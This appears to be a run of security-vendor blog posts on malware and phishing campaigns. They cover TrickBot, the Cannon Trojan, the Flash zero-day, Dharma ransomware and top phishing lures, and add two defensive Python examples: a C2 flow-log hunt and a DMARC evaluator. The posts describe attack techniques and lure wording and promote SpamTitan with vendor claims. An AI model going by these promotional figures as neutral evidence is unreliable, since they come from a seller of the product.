The cryptocurrency mining slowed the devices to such an extent that they were virtually unusable, causing many to continually crash and reboot. The network also slowed to a snail’s pace due to the streams of malicious traffic. While the upgraded Windows 10 machines were not affected initially, the attackers subsequently downloaded keyloggers onto the compromised devices and obtained the credentials of an IT support technician who had domain administration rights. The attackers then used those privileges to disable Windows Defender updates on desktops, servers, and domain controllers.
Over the course of a week, further Trojan modules were downloaded by creating scheduled tasks using the credentials of the IT support worker. A spam module was used to send malicious messages throughout the school district and several email accounts were compromised as a result and had malware downloaded. Other devices were infected through network shares. The TrickBot banking Trojan was downloaded and was used to attack the systems used by the finance department, although that Trojan was detected and blocked.
Remediation Took 6 Weeks
Remediating the attack was complicated. First, the IT department disabled SMBv1 on all devices, as it was not known which devices were vulnerable. Via a Windows Group Policy, the IT team then blocked the creation of scheduled tasks. Every device on the network had Windows Defender updates downloaded manually, and using the Autoruns tool for Windows, all processes and files run by the Trojan were deleted. The whole process of identifying, containing, and disabling the malware took 6 weeks.
The attack was made possible through an attack on a single user, although it was the continued use of unsupported operating systems and software that made the malware attack so severe.
The attack shows why it is crucial to ensure that IT best practices are followed and why patching is so important. For that to happen, the IT department needs to have a complete inventory of all devices and needs to make sure that each one is updated.
While Microsoft released a patch to correct the flaw in SMBv1 that was exploited through EternalBlue, the vulnerable Windows XP devices were not updated, even though Microsoft had released an update for the unsupported operating system in the spring of 2017.
Additional Protection is Required for Office 365 Inboxes
The attack also shows how the actions of a single user can have grave repercussions. By blocking malicious emails at source, attacks such as this will be much harder to pull off. While Office 365 spam filtering controls block many email-based threats, even with Microsoft’s Advanced Threat Protection many emails slip through and are delivered to inboxes.
Hackers can also see whether Office 365 is being used as it is broadcast through DNS MX records, which allows them to target Office 365 users and launch attacks.
Due to the additional cost of ATP, the lack of flexibility, and the volume of malicious emails that are still delivered to inboxes, many businesses have chosen to implement a more powerful spam filtering solution on top of Office 365.
One such solution that has been developed to work seamlessly with Office 365 to improve protection against email threats is SpamTitan.
There has been an increase in phishing attacks on retailers, supermarket chains, and restaurants in recent weeks. The aim of the phishing attacks is to deliver remote access Trojans and remote manipulator software to gain persistent access to computers and, ultimately, obtain banking credentials and sensitive customer data on POS systems.
Several new campaigns have been detected in recent weeks targeting retail and food sector companies, both of which are well into the busiest time of the year. With employees working hard, it is likely that less care will be taken opening emails which gives cybercriminals an opportunity.
PUB Files Used in Phishing Attacks on Retailers
Over the past few weeks, security researchers have noted an uptick in phishing attacks on retailers, with one threat group switching to using .pub files to install malware. Many phishing attacks use Word documents containing malicious macros; the use of macros in .pub files is relatively uncommon. The change to this new attachment type may fool employees, as they are less likely to associate these files with cyberattacks.
Social engineering techniques are used to fool end users into opening the files, with the .pub files masquerading as invoices. Many emails have been intercepted that appear to have been sent from within a company, which helps to make the files appear genuine.
If opened, the .pub files, via malicious macros, run Microsoft Installer (MSI) files that deliver a remote access Trojan. Since these installers will most likely be familiar to end users, they may not realize the installers are malicious. Further, the MSI files are time delayed so they do not run immediately when the .pub files are opened, increasing the probability that the RAT downloads will go unnoticed.
The TA505 threat group is using this tactic to install the FlawedAmmyy remote access Trojan and other malicious payloads such as Remote Manipulator System (RMS) clients.
The phishing emails used to deliver these malicious files are targeted and tailored to a specific business to increase the likelihood of success. These targeted spear phishing attacks are now becoming the norm, as threat actors move away from the spray and pray tactics of old.
Cape Cod Community College Phishing Attack Results in Theft of More Than $800,000
Phishing attacks on retailers have increased, but other industries are also at risk. Educational institutions are also prime targets, as has been highlighted by a recent phishing attack on Cape Cod Community College.
The Cape Cod Community College phishing attack involved sophisticated messages that delivered malware capable of evading the college’s anti-virus software. The malware was used to obtain the banking credentials of the college, and once those credentials had been obtained, the hackers proceeded to make fraudulent transfers and empty bank accounts. Transfers totaling $807,130 were made, and so far, the college and its bank have only been able to recover $278,887.
All too often, fraudulent transfers are not detected quickly enough to recover any funds. Once the transfers have cleared the attacker-controlled bank accounts are emptied, after which the probability of recovering funds falls to near zero.
Defense in Depth the Key to Phishing Protection
Email is the primary vector used to phish for sensitive information and deliver malware to businesses. Regardless of whether businesses use local email systems or cloud-based email services such as Office 365, advanced spam filtering controls are required to block threats. For instance, SpamTitan blocks more than 99.9% of spam email and 100% of known malware. SpamTitan also uses heuristics, machine learning, and Bayesian analysis to identify previously unseen threats, one of the areas of weakness of Office 365’s anti-phishing defenses.
Network segmentation is also essential. Critical services must be separated to ensure that the installation of malware or ransomware on one device will not allow the attackers to gain access to the entire network. This is especially important for retailers and other businesses with POS systems. Network segmentation will help to keep POS systems and the financial data of customers secure.
Advanced endpoint protection solutions offer far greater protection than standard antivirus solutions and are less reliant on malware signatures. Standard AV solutions will only block known malware. With standard AV solutions, new malware variants can easily slip through the net.
End user security awareness training should be mandatory for all employees and training needs to be a continuous process. A once a year training session is no longer sufficient. Regular training throughout the year is required to ensure employees are made aware of the latest threats and tactics being used to gain access to login credentials and install malware.
For further information on improving email security to improve protection against phishing attacks, contact the TitanHQ team today.
Adobe has issued an unscheduled update to correct flaws in Adobe Flash Player, including a zero-day vulnerability that is currently being exploited in the wild by an APT threat group on targets in Russia. One target was a Russian healthcare facility that provides medical and cosmetic surgery services to high level civil servants of the Russian Federation.
The zero-day flaw is a use-after-free vulnerability – CVE-2018-15982 – which allows arbitrary code execution and privilege escalation in Flash Player. A malicious Flash object runs code on a victim’s computer, giving command line access to the system.
The vulnerability was discovered by security researchers at Gigamon ATR who reported the flaw to Adobe on November 29. Researchers at Qihoo 360 identified a spear phishing campaign that is being used to deliver a malicious document and associated files that exploit the flaw. The document used in the campaign was a forged employee questionnaire.
The emails included a .rar compressed file attachment which contained a Word document, the exploit for the vulnerability, and the payload. If the .rar file is unpacked and the document opened, the user is presented with a warning that the document may be harmful to the computer. If content is enabled, a malicious command is executed which extracts and runs the payload, a Windows executable file named backup.exe that is disguised as an NVIDIA Control Panel application. Backup.exe serves as a backdoor into the system. The malicious payload collects system information, which is sent back to the attackers via HTTP POST, and also downloads and executes shellcode on the infected device.
Qihoo 360 researchers have named the campaign Operation Poison Needles due to the identified target being a healthcare clinic. While the attack appears to be politically motivated and highly targeted, now that details of the vulnerability have been released it is likely that other threat groups will use exploits for the vulnerability in more widespread attacks.
It is therefore important for businesses that have Flash Player installed on some of their devices to update to the latest version of the software as soon as possible. That said, uninstalling Flash Player, if it is not required, is a better option given the number of vulnerabilities that are discovered in the software each month.
The vulnerability is present in Flash Player 184.108.40.206 and all earlier versions. Adobe has corrected the flaw together with a DLL hijacking vulnerability in version 220.127.116.11.
A new module has been added to TrickBot malware that adds point-of-sale (POS) data collection capabilities.
TrickBot is modular malware that is being actively developed. In early November, TrickBot was updated with a password stealing module, but the latest update has made it even more dangerous, especially for hotels, retail outlets, and restaurants: businesses that process large volumes of card payments.
The new module was identified by security researchers at Trend Micro who note that, at present, the module is not being used to record POS data such as credit/debit card numbers. Currently, the new TrickBot malware module is only collecting data about whether an infected device is part of a network that supports POS services and the types of POS systems in use. The researchers have not yet determined how the POS information will be used, but it is highly likely that the module is being used for reconnaissance. Once targets with networks supporting POS systems have been identified, they will likely be subjected to further intrusions.
The new module, named psfin32, is similar to a previous network domain harvesting module but has been developed specifically to identify POS-related terms from domain controllers and basic accounts. The module achieves this by using LDAP queries to Active Directory Services which search for a dnsHostName that contains strings such as ‘pos’, ‘retail’, ‘store’, ‘micros’, ‘cash’, ‘reg’, ‘aloha’, ‘lane’, ‘boh’, and ‘term’.
The timing of the update, so close to the holiday period, suggests the threat actors are planning to take advantage of the increase in holiday trade and are gathering as much information as possible before the module is used to harvest POS data.
The recent updates to TrickBot malware have been accompanied by a malicious spam email campaign (identified by Brad Duncan) which is targeting businesses in the United States. The malspam campaign uses Word documents containing malicious macros that download the TrickBot binary.
Protecting against TrickBot and other information stealing malware requires a defense-in-depth approach to cybersecurity. The main attack vector used by the threat actors behind TrickBot is spam email, so it is essential for an advanced anti-spam solution to be deployed to prevent malicious messages from being delivered to end users’ inboxes. End user training is also essential to ensure employees are made aware of the danger of opening emails from unknown senders, launching suspicious email attachments, and clicking hyperlinks in those messages.
Antivirus solutions and endpoint security controls should also be deployed to identify and quarantine potentially malicious files in case malware makes it past perimeter defenses.
There is a more cost-effective alternative to Cisco OpenDNS that provides total protection against web-based threats at a fraction of the price of OpenDNS. If you are currently running OpenDNS or have yet to implement a web filtering solution, you can find out about this powerful web filtering solution in a December 5, 2018 webinar.
Cybersecurity defenses can be implemented to secure the network perimeter, but employees often take risks online that can lead to costly data breaches. The online activities of employees can easily result in malware, ransomware, and viruses being downloaded. Employees may also respond to malicious adverts (malvertising) or visit phishing websites where they are relieved of their login credentials.
Mitigating malware infections, dealing with ransomware attacks, and resolving phishing-related breaches have a negative impact on the business and the resultant data breaches can be incredibly costly. Consequently, the threat from web-based attacks cannot be ignored.
Fortunately, there is an easy solution that offers protection against web-based threats by carefully controlling the web content that employees can access: a DNS-based web filter.
DNS-based web filtering requires no hardware purchases and no software downloads. Within around 5 minutes, a business will be able to control employee internet access and block web-based threats. Some DNS-based web filters such as OpenDNS can be costly, but there is a more cost-effective alternative to Cisco OpenDNS.
TitanHQ and Celestix Networks will be running a joint webinar to introduce an alternative to Cisco OpenDNS – the WebTitan-powered solution, Celestix WebFilter Cloud.
Celestix will be joined by Rocco Donnino, TitanHQ EVP of Strategic Alliances, and Senior Sales Engineer, Derek Higgins who will explain how the DNS-based filtering technology offers total protection from web-based threats at a fraction of the cost of OpenDNS.
The webinar will be taking place on Wednesday, December 5, 2018 at 10:00 AM US Pacific Time.
A previously unseen malware variant, dubbed the Cannon Trojan, is being used in targeted attacks on government agencies in the United States and Europe. The new malware threat has been strongly linked to a threat group known under many names – APT28, Fancy Bear, Sofacy, Sednit, Strontium – that has links to the Russian government.
The Cannon Trojan is being used to gather information on potential targets, collecting system information and taking screenshots that are sent back to APT28. The Cannon Trojan is also a downloader capable of installing further malware variants onto a compromised system.
The new malware threat is stealthy and uses a variety of tricks to avoid detection and hide communications with its C2. Rather than communicating over HTTP/HTTPS like other malware variants used by APT28, the Cannon Trojan communicates via email over SMTPS and POP3S.
Once installed, an email is sent over SMTPS through port 465, and a further two email addresses are obtained through which the malware communicates with its C2 using the POP3S protocol to receive instructions and send back data. While the use of email for communicating with a C2 is not unknown, it is relatively rare. One advantage of this method of communication is that it is more difficult to identify and block than HTTP/HTTPS.
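Because SMTPS and POP3S traffic never passes a web proxy, the place to look for this C2 pattern is firewall or flow logs. The added example below (not Unit 42's or TitanHQ's code) reads constructed flow records and flags internal hosts that speak a mail protocol to any server other than the sanctioned mail gateways, then singles out hosts that both send over SMTPS and poll over POP3S to the same foreign server, which is the exchange described above. The network ranges, gateway addresses and log format are assumptions.

```python
"""Flow-log hunt for mail-protocol C2 channels (added example; not Unit 42 or TitanHQ code)."""
import ipaddress
from collections import defaultdict
from typing import Dict, List

MAIL_PORTS = {465: "SMTPS", 587: "SMTP submission", 993: "IMAPS", 995: "POP3S"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
# Assumed allow-list: the on-premises gateway and the external address mail is sanctioned to
# reach. Constructed values; in practice resolve the sanctioned hostnames to build this set.
SANCTIONED_MAIL_SERVERS = {ipaddress.ip_address("10.0.5.25"), ipaddress.ip_address("203.0.113.25")}

# Constructed flow records in a simple CSV export shape (timestamp, partial 5-tuple, bytes sent).
SAMPLE_FLOWS = """\
ts,src_ip,dst_ip,dst_port,proto,bytes_out
2018-11-20T10:01:05,10.0.12.34,10.0.5.25,587,tcp,4120
2018-11-20T10:02:11,10.0.12.34,198.51.100.44,465,tcp,2380
2018-11-20T10:02:40,10.0.12.34,198.51.100.44,995,tcp,910
2018-11-20T10:03:02,10.0.12.34,198.51.100.44,995,tcp,880
2018-11-20T10:05:17,10.0.7.9,203.0.113.25,993,tcp,15200
2018-11-20T10:06:00,10.0.7.9,198.51.100.80,443,tcp,70000
"""


def parse_flows(text: str) -> List[dict]:
    lines = text.strip().splitlines()
    header = lines[0].split(",")
    flows = []
    for line in lines[1:]:
        row = dict(zip(header, line.split(",")))
        row["dst_port"] = int(row["dst_port"])
        row["bytes_out"] = int(row["bytes_out"])
        flows.append(row)
    return flows


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_unsanctioned_mail_flows(flows: List[dict]) -> List[dict]:
    """Flows where an internal host speaks a mail protocol to a server that is not a sanctioned gateway."""
    return [f for f in flows
            if f["dst_port"] in MAIL_PORTS
            and is_internal(f["src_ip"])
            and ipaddress.ip_address(f["dst_ip"]) not in SANCTIONED_MAIL_SERVERS]


def summarize_by_host(hits: List[dict]) -> Dict[str, Dict[str, List[str]]]:
    """src_ip -> {dst_ip: [protocol names]} so an analyst sees each host's foreign mail peers."""
    summary = defaultdict(lambda: defaultdict(set))
    for f in hits:
        summary[f["src_ip"]][f["dst_ip"]].add(MAIL_PORTS[f["dst_port"]])
    return {src: {dst: sorted(protos) for dst, protos in peers.items()} for src, peers in summary.items()}


def cannon_like_hosts(flows: List[dict]) -> List[str]:
    """Hosts that both send over SMTPS and poll over POP3S to the same non-sanctioned server,
    the pattern described for Cannon's C2 channel."""
    summary = summarize_by_host(find_unsanctioned_mail_flows(flows))
    return sorted(src for src, peers in summary.items()
                  if any({"SMTPS", "POP3S"} <= set(protos) for protos in peers.values()))


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print(summarize_by_host(find_unsanctioned_mail_flows(flows)))
    print("Cannon-like hosts:", cannon_like_hosts(flows))
```

The allow-list is what makes this usable: legitimate submission to the corporate gateway on 587 and IMAPS to the sanctioned external address are dropped from the hits, so what remains is a workstation holding an SMTPS and POP3S conversation with a server nobody in the organisation uses for mail.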
The Cannon Trojan, like the Zebrocy Trojan which is also being used by APT28, is being distributed via spear phishing emails. Two email templates have been intercepted by Palo Alto Networks’ Unit 42 team, one of which takes advantage of interest in the Lion Air plane crash in Indonesia.
The Lion Air spear phishing campaign appears to provide information on the victims of the crash, which the email claims are detailed in an attached Word document titled Crash List (Lion Air Boeing 737).docx. The user must Enable Content to view the contents of the document. It is claimed that the document was created in an earlier version of Word and content must be enabled for the file to be displayed. Opening the email and enabling content would trigger the macro to run, which would then silently download the Cannon Trojan.
Rather than the macro running and downloading the payload straight away, the attackers use Word’s AutoClose auto-macro as an anti-analysis mechanism, deferring completion of the macro routine until the document is closed. Only then is the Trojan downloaded. Any sandbox that analyzes the document and exits before closing it would be unlikely to identify it as malicious. Further, the macro will only run if a connection with the C2 is established: even if the document is opened and content is enabled, the macro will not run without its C2 channel open.
The techniques used by the attackers to obfuscate the macro and hide communications make this threat difficult to detect. The key to preventing infection is blocking the threat at source and preventing it from reaching inboxes. The provision of end user training to help employees identify threats such as emails with attachments from unknown senders is also important.
Enhance Protection Against Zero-Day Malware and Spear Phishing
TitanHQ has developed a powerful anti-phishing and anti-spam solution that is effective at blocking advanced persistent threats and zero-day malware and does not rely solely on signature-based detection methods. While dual anti-virus engines offer protection against 100% of known malware, unlike many other spam filtering solutions, SpamTitan uses a variety of predictive techniques to identify previously unseen threats and spear phishing attacks.
Greylisting is used to identify domains used for spamming that have yet to be blacklisted. All incoming emails are subjected to Bayesian analysis, and heuristics are used to identify new threats.
To further protect against phishing attacks, URIBL and SURBL lookups are used to check embedded hyperlinks. SpamTitan also scans outbound mail to prevent abuse and identify attempted data theft.
For further information on SpamTitan, to book a product demonstration, or to sign up for a free trial of the full product, contact the TitanHQ team today.
Office 365 has many benefits, so it is no surprise that it is proving so popular with businesses, but one common complaint is the number of spam and malicious emails that sneak past Microsoft’s defenses. If you have a problem with spam and phishing emails still being delivered to your end users, there is an easy solution to improve the Office 365 spam filter and block more threats.
Office 365 Email Protection
More than 155 million commercial users are now on Office 365 and that figure is growing at a rate of around 3 million users per month. Unfortunately, the popularity of Office 365 has made it a target for hackers, who are testing their campaigns in their own Office 365 environments to make sure their malspam messages are delivered. Businesses using Office 365 are being sought out and attacked.
Microsoft has been proactively taking steps to improve the Office 365 spam filter to make it more effective at blocking spam and phishing attempts. Office 365 phishing protections have been improved and more malicious emails are now being blocked; however, even with the recent anti-phish enhancements, many businesses still have to deal with an unacceptable volume of spam, phishing emails are still reaching inboxes, and malware is sneaking past Office 365 protections.
Office 365 Spam Protection
Office 365 provides a reasonable level of protection from spam. You can expect Microsoft to block around 99% of all spam emails. While that figure is good, the 1% that are not blocked can amount to a sizeable number of emails. Around 4.5 billion email messages are sent each day and around 46% of those messages are spam. Each inbox may only receive a handful of spam messages but each message that has to be opened, checked, and dealt with by employees is a drain on productivity.
Office 365 Phishing Protection
Spam is a nuisance, but it does not typically pose a threat to businesses. Malspam, on the other hand, certainly does. Malspam is the name given to spam email that is used for malicious purposes, such as scam and phishing emails and spam messages used to distribute malware. This is an area where default Office 365 email protection falls short of the requirements of many businesses.
Businesses using Office 365 as a hosted email solution are likely to have their email filtered using Exchange Online Protection (EOP). EOP is included in an Office 365 subscription and it does a reasonable job of blocking spam, phishing emails, and malware. Given the number of email-based attacks that are now being conducted by cybercriminals, and the high costs of dealing with those attacks, being ‘reasonably’ well protected from malspam is simply not good enough.
Many businesses have found that EOP blocks basic phishing attacks but comes up short at blocking more advanced email threats such as spear phishing and advanced persistent threats. EOP is best at blocking large scale phishing campaigns where attackers use huge email lists and ‘spray and pray’ tactics. These tried and tested techniques are becoming less effective thanks to improvements in spam filtering.
The relatively poor return on these scams has seen many threat actors invest more time in their campaigns and develop new methods of attack. There is a growing trend for more targeted attacks using more sophisticated phishing methods. EOP is not very effective at blocking these types of phishing attacks. One study conducted by Avanan showed 25% of phishing emails were delivered to inboxes and were not blocked by EOP. These targeted attacks are also being conducted on SMBs, not just on large enterprises.
To improve the Office 365 spam filter, you can upgrade to Advanced Threat Protection (ATP), the second level of protection for Office 365 offered by Microsoft. The level of protection is much better with this paid service, although ATP is still not effective at blocking zero-day threats and falls short of the level of protection provided by most third-party anti-spam and anti-phishing solutions for Office 365. An SE Labs study conducted in the summer of 2017 found that even with the additional level of protection, which is only available in the Office 365 E5 license tier, protection only ranked in the low-middle of the market.
Office 365 Malware Protection
An Osterman Research study showed EOP eliminates 100% of known malware threats but is not nearly as effective at identifying zero-day threats. New malware variants are now being released at a rate of around 350,000 a day, according to AV-TEST.
These new malware threats are a serious risk. If they are not detected as malicious and are delivered to inboxes, malicious attachments can be opened by employees. You can train your workforce to be more security aware, but it is unreasonable to expect every employee to be able to identify every malicious message and act appropriately. Mistakes are inevitable. Those mistakes can be extremely costly. According to the 2019 Ponemon Institute/IBM Security Cost of a Data Breach Study, the global average cost of a data breach is $4.88 million and $8.19 million in the United States!
The number of cases of hackers exploiting vulnerabilities in Office 365 and the volume of direct attacks on Office 365 users have seen an increasing number of businesses turning to third-party email protection solutions for Office 365. These solutions are layered on top of EOP and greatly improve Office 365 spam filter capabilities.
There is another reason why it is wise to choose a third-party solution to improve Office 365 email protection rather than opting for Microsoft’s ATP. It is important to have layered defenses to protect against cyberattacks, and while layers can be added through the same company, it pays not to put all your eggs in one basket. When businesses have their email on-premises, they typically have many layers to their defenses, and they do not all come from the same solution provider. If a threat is not detected by one solution provider, there is more chance of it being detected by a different provider than by a second solution from the same company. The same thinking should be applied to your cloud-hosted Office 365 environment.
An Easy Way to Improve the Office 365 Spam Filter
Businesses that want to further improve the Office 365 spam filter (and those looking for an Office 365 Advanced Threat Protection alternative) need to consider implementing a third-party anti-spam solution.
Fortunately, there is a solution that will not only improve Office 365 spam filtering, it is quick and easy to implement, requires no software downloads, and no hardware purchases are necessary. In fact, it can be implemented, configured, and be up and running in a few minutes.
SpamTitan is a powerful cloud-based email security solution that has been developed to provide superior protection against spam, phishing, malware, zero-day attacks, and data loss via email.
In contrast to the Office 365 spam filter, SpamTitan uses predictive techniques such as Bayesian analysis, machine learning, and heuristics to block zero-day attacks, advanced persistent threats, new malware variants, and new spear phishing methods.
SpamTitan searches email headers, analyzes domains, and scans email content to identify phishing threats. Embedded hyperlinks, including shortened URLs, are scanned in real time and subjected to multiple URL reputation checks, while dual antivirus engines scan and block 100% of known malware. SpamTitan also includes sandboxing, where potentially malicious files and programs can be subjected to in-depth analysis in safety. In the sandbox, files are analyzed for malicious actions and C2 server callbacks.
SpamTitan also incorporates data loss prevention tools for emails and attachments, which are not available with EOP. Users can create tags for keywords and data elements such as Social Security numbers to protect against theft by insiders. SpamTitan also serves as a backup for your mail server to ensure business continuity.
With SpamTitan you get a greater level of protection against spam and malicious emails, a higher spam catch rate (over 99.9%), greater granularity, improved control over outbound email, and better business continuity protections.
If you have transitioned to Office 365 yet are still having problems with spam, phishing, and other malicious emails, or if you are an MSP that wants to offer your clients enhanced Office 365 email security, contact the TitanHQ team today.
The TitanHQ team will be happy to schedule a personalized product demonstration and help you put SpamTitan through the paces in your own environment in a no-obligation free trial.
FAQs on Improving the Office 365 Spam Filter
How does SpamTitan differ from the Office 365 spam filter?
SpamTitan has many advanced features not included in Office 365 and provides a defense in depth approach against malware, phishing and other email threats. SpamTitan includes predictive techniques such as Bayesian analysis, heuristics, and machine learning to block new threats, dual AV engines and sandboxing to block malware threats, data leak prevention measures, dedicated RBLs as standard, and allows customized policies to be created for users, domains, domain groups, and the overall system, along with many more features to improve protection for Office 365 environments.
How does sandboxing work?
SpamTitan incorporates a powerful, next-generation sandbox solution. Suspicious messages that pass initial checks are sent to the sandbox for in-depth analysis to identify any malicious actions such as C2 callbacks. If these checks are passed, the message is delivered; if malicious activity is detected, the message will be quarantined or deleted, depending on the policy set by the administrator. Sandboxing is essential for blocking zero-day malware threats.
Why is it necessary to scan outbound emails?
If spam or malicious emails are sent from your mailboxes, you are likely to have your IP added to a spam blacklist and your emails may not be delivered. Outbound scanning can quickly detect a compromised inbox or rogue employee and block outbound emails before any harm is caused. Rules can be set to prevent certain attachments from being sent and data elements can be tagged to protect against data leaks.
How does SpamTitan protect against email spoofing attacks?
SpamTitan supports DKIM signing and incorporates the DMARC (Domain-based Message Authentication, Reporting and Conformance) email-validation system, which has been designed to detect and block email spoofing attacks. A DNS TXT record is used to create an overall policy governing SPF and DKIM, allowing you to accept messages, quarantine them, or reject them if they fail the DMARC check.
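A worked evaluator for the DMARC decision described above, added here as an example and not SpamTitan code: it parses a published DMARC TXT record, checks SPF and DKIM identifier alignment in relaxed or strict mode, and returns pass, none, quarantine or reject. The record, domains and results are constructed, and the organizational-domain lookup is simplified to the last two labels (a real implementation consults the Public Suffix List).

```python
"""Evaluate a DMARC policy against SPF and DKIM results (added example).

Simplifications: the organizational domain is approximated by the last two
labels, and pct= sampling uses a caller-supplied roll (0-99) instead of a
random draw so the outcome is reproducible.
"""
from dataclasses import dataclass


@dataclass
class AuthResult:
    passed: bool
    domain: str  # domain the check authenticated (SPF MAIL FROM / DKIM d=)


def parse_dmarc(txt: str) -> dict:
    """Parse the tag=value pairs of a DMARC TXT record and apply defaults."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        raise ValueError("not a DMARC record")
    tags.setdefault("p", "none")
    tags.setdefault("sp", tags["p"])       # subdomain policy defaults to p=
    tags.setdefault("adkim", "r")           # relaxed alignment by default
    tags.setdefault("aspf", "r")
    tags.setdefault("pct", "100")
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: last two labels (assumption)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Strict mode needs an exact match; relaxed accepts the same org domain."""
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def evaluate(record: str, from_domain: str, spf: AuthResult,
             dkim: AuthResult, roll: int = 0) -> str:
    """Return 'pass' or the disposition (none/quarantine/reject) to apply."""
    tags = parse_dmarc(record)
    spf_ok = spf.passed and aligned(from_domain, spf.domain, tags["aspf"])
    dkim_ok = dkim.passed and aligned(from_domain, dkim.domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass"  # one aligned, passing mechanism is enough
    # A message from a subdomain of the publishing domain is governed by sp=.
    is_org = org_domain(from_domain) == from_domain.lower().rstrip(".")
    policy = tags["p"] if is_org else tags["sp"]
    if roll >= int(tags["pct"]):
        # Outside the sampled percentage the policy steps down one level.
        policy = {"reject": "quarantine", "quarantine": "none"}.get(policy, "none")
    return policy


if __name__ == "__main__":
    # Constructed record and results for illustration.
    rec = "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; pct=100; rua=mailto:dmarc@example.com"
    print(evaluate(rec, "example.com", AuthResult(True, "bounce.example.com"), AuthResult(False, "")))
    print(evaluate(rec, "example.com", AuthResult(True, "example.net"), AuthResult(True, "news.example.com")))
    print(evaluate(rec, "mail.example.com", AuthResult(False, ""), AuthResult(False, "")))
```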
How much does SpamTitan cost and are there any discounts?
The cost of SpamTitan varies depending on the number of mailboxes you want to protect and the length of the contract, with sizable discounts offered to organizations that commit to a 2- or 3-year term. The easiest way to find out how much SpamTitan is likely to cost is to use our cost calculator.
A new Dharma ransomware variant has been developed that is currently evading detection by the majority of antivirus engines. According to Heimdal Security, the latest Dharma ransomware variant captured by its researchers was only detected as malware by one of the 53 AV engines on VirusTotal.
Dharma ransomware (also known as CrySiS) first appeared in 2006 and is still being developed. This year, several new Dharma ransomware variants have been released, each using new file extensions for encrypted files (.bip, .xxxxx, .like, .java, .arrow, .gamma, .arena, .betta, and .tron to name but a few). In the past two months alone four new Dharma ransomware variants have been detected.
The threat actors behind Dharma ransomware have claimed many victims in recent months. Successful attacks have been reported recently by Altus Baytown Hospital in Texas, the Arran brewery in Scotland, and the port of San Diego.
While free decryptors for Dharma ransomware have been developed, the constant evolution of this ransomware threat rapidly renders these decryptors obsolete. Infection with the latest variants of the ransomware threat only gives victims three options: pay a sizeable ransom to recover files, restore files from backups, or face permanent file loss.
The latter is not an option given the extent of files that are encrypted. Restoring files from backups is not always possible as Dharma ransomware can also encrypt backup files and can delete shadow copies. Payment of a ransom is not advised as there is no guarantee that files can or will be decrypted.
Protecting against ransomware attacks requires a combination of policies, procedures, and cybersecurity solutions. Dharma ransomware attacks are mostly conducted via two attack vectors: the exploitation of Remote Desktop Protocol (RDP) and email malspam campaigns.
The latest Dharma ransomware variant attacks involve an executable file being dropped by a .NET file and an HTA file. Infections occur via RDP-enabled endpoints using brute force attempts to guess passwords. Once the password is obtained, the malicious payload is deployed.
While it is not exactly clear how the Arran brewery attack occurred, a phishing attack is suspected. Phishing emails had been received just before file encryption. “We cannot be 100 percent sure that this was the vector that infection occurred through, but the timing seems to be more than coincidental,” said Arran Brewery’s managing director Gerald Michaluk.
To protect against RDP attacks, RDP should be disabled unless it is absolutely necessary. If RDP is required, access should only be possible through a VPN and strong passwords should be set. Rate limiting or account lockout should be configured to block further login attempts after a set number of failures.
Naturally, good backup policies are essential. They will ensure that file recovery is possible without payment of a ransom. Multiple copies of backups should be made with one copy stored securely off site.
To protect against email-based attacks, an advanced spam filter is required. Spam filters that rely on AV engines may not detect the latest ransomware variants. Advanced analyses of incoming messages are essential.
SpamTitan can improve protection for businesses through a combination of two AV engines and predictive techniques to block new types of malware for which AV signatures are not yet available.
For further information on SpamTitan and protecting your email gateway from ransomware attacks and other threats, speak to TitanHQ’s security experts today.
Phishing is the number one security threat faced by businesses. In this post we explore why phishing is such a serious threat and the top phishing lures that are proving to be the most effective at getting employees to open malicious attachments, click on hyperlinks, and visit phishing websites.
Phishing is the Biggest Security Threat Faced by Businesses
Phishing is a tried and tested social engineering technique that is favored by cybercriminals for one very simple reason. It is very effective. Phishing emails can be used to fool end users into installing malware or disclosing their login credentials. It is an easy way for hackers to gain a foothold in a network to conduct further cyberattacks on a business.
Phishing works because it targets the weakest link in security defenses: End users. If an email is delivered to an inbox, there is a relatively high probability that the email will be opened. Messages include a variety of cunning ploys to fool end users into taking a specific action such as opening a malicious email attachment or clicking on an embedded hyperlink.
Listed below are the top phishing lures of 2018 – The messages that have proven to be the most effective at getting end users to divulge sensitive information or install malware.
Top Phishing Lures of 2018
Determining the top phishing lures is not straightforward. Many organizations are required to publicly disclose data breaches to comply with industry regulations, but details of the phishing lures that have fooled employees are not usually made public.
Instead, the best way to determine the top phishing lures is to use data from security awareness training companies. These companies have developed platforms that businesses can use to run phishing simulation exercises. To obtain reliable data on the most effective phishing lures it is necessary to analyze huge volumes of data. Since these phishing simulation platforms are used to send millions of dummy phishing emails to employees and track responses, they are useful for determining the most effective phishing lures.
In the past few weeks, two security awareness training companies have published reports detailing the top phishing lures of 2018: Cofense and KnowBe4.
Top Phishing Lures on the Cofense Platform
Cofense has created two lists of the top phishing lures of 2018. One is based on the Cofense Intelligence platform which collects data on real phishing attacks and the second list is compiled from responses to phishing simulations.
Both lists are dominated by phishing attacks involving fake invoices. Seven out of the ten most effective phishing campaigns of 2018 mentioned "invoice" in the subject line. The other three were also finance related: payment remittance, statement and payment. This stands to reason. The finance department is the primary target in phishing attacks on businesses.
The list of the top phishing lures from phishing simulations was also dominated by fake invoices, which outnumbered the second most clicked phishing lure by 2 to 1.
Top phishing simulation lures, ranked by number of reported emails:
New Message in Mailbox
Online Order (Attachment)
Secure Message (MS Office Macro)
Online Order (Hyperlink)
Confidential Scanned document (Attachment)
Conversational Wire transfer (BEC Scam)
Top Phishing Lures on the KnowBe4 Platform
KnowBe4 has released two lists of the top phishing lures of Q3, 2018, which were compiled from responses to simulated phishing emails and from real-world phishing attempts on businesses that were reported to IT security departments.
The most common real-world phishing attacks in Q3 were:
You have a new encrypted message
IT: Syncing Error – Returned incoming messages
HR: Contact information
FedEx: Sorry we missed you.
